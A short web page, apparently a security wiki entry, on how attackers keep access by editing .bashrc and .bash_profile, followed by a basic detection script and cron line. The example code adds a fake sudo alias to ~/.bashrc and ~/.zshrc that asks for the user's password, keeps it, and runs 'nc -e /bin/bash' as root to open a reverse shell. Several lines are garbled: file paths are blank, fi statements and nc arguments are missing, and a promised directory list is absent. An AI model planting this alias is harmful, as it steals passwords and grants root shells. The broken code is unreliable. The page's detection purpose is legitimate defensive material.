Skip to content

Persistence through .bashrc and .bash_profile

    While changing your .bashrc and .bash_profile can be great to customize your bash experience, they can also be used as a persistence mechanism for an adversary. The following directories can be used for this persistence mechanism.


    You can take the below example malicious code and add it to any of the above files above to have a bash shell callout to <ip> and <port>

    Example Code:

    <var>="<.hidden filename> "
     cat << EOF > /tmp/
       alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc   -e /bin/bash > /dev/null && /usr/bin/sudo -S '
     if [ -f ~/.bashrc ]; then
         cat /tmp/ >> ~/.bashrc
     if [ -f ~/.zshrc ]; then
         cat /tmp/ >> ~/.zshrc
     rm /tmp/<var>

    This can easily be detected by looking in these file locations for any additions or by using the following code to detect changes.

    Example Detection Code:

     MOD=find ./ \( -cmin -$MIN -or -mmin -$MIN -or -amin -$MIN \) -name '~/.bashrc'
     if [ -n "$MOD" ]; then
         notify-send -u critical -t 0 -i /usr/share/icons/gnome/32x32/status/dialog-warning.png ".bashrc config file has been modified"
    add cron job to check every 30 min
    30 * * * * /bin/bash /<path>/

    Optimized by Optimole